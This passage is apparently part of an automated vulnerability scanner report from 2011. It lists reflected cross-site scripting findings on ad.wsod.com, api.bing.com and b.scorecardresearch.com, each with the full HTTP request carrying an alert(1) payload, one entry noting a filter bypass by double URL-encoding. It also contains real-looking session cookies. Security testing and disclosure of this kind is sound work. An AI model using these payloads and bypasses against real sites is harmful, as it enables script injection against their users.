HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9476a"-alert(1)-"985f8e3db43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ad74"-alert(1)-"523f8ff21d1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77be7"-alert(1)-"86a6913ea5d was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79400"-alert(1)-"898301abb9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a932"-alert(1)-"098c112b24 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5 was submitted in the REST URL parameter 2. This input was echoed as bdbb2";alert(1)//d3a2d6e4cb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c9b%2522%253balert%25281%2529%252f%252fe620cc65532 was submitted in the REST URL parameter 3. This input was echoed as 36c9b";alert(1)//e620cc65532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b%2522%253balert%25281%2529%252f%252fe620cc65532/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be94"-alert(1)-"68a9d8cb374 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734d6"-alert(1)-"39b801b9989 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f21b"-alert(1)-"3bd3b22176f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2bd"-alert(1)-"c32921f3ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 was submitted in the q parameter. This input was echoed as 412b0<img src=a onerror=alert(1)>167ebef1169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?form=MSN005&q=412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: dc4cad0d277c4e69b70a6ff416da300c Date: Tue, 26 Apr 2011 18:36:47 GMT Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7a00<script>alert(1)</script>2b050c4882a was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 18:36:29 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 595c5<script>alert(1)</script>e3e814fd6cc was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3595c5<script>alert(1)</script>e3e814fd6cc&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:44 GMT Date: Tue, 26 Apr 2011 18:39:44 GMT Connection: close Content-Length: 1250
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66376<script>alert(1)</script>fbc5d350fe7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=603533866376<script>alert(1)</script>fbc5d350fe7&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:45 GMT Date: Tue, 26 Apr 2011 18:39:45 GMT Connection: close Content-Length: 1250
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a0acc<script>alert(1)</script>2c22c5ef1fd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!a0acc<script>alert(1)</script>2c22c5ef1fd&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ar c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 2724d<script>alert(1)</script>ef3e74934bc was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!2724d<script>alert(1)</script>ef3e74934bc&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 41c00<script>alert(1)</script>f9b5dad6c03 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=6243129141c00<script>alert(1)</script>f9b5dad6c03&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 98717<script>alert(1)</script>403ae54048e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=98717<script>alert(1)</script>403ae54048e& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 567db<img%20src%3da%20onerror%3dalert(1)>4321673800c was submitted in the REST URL parameter 18. This input was echoed as 567db<img src=a onerror=alert(1)>4321673800c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
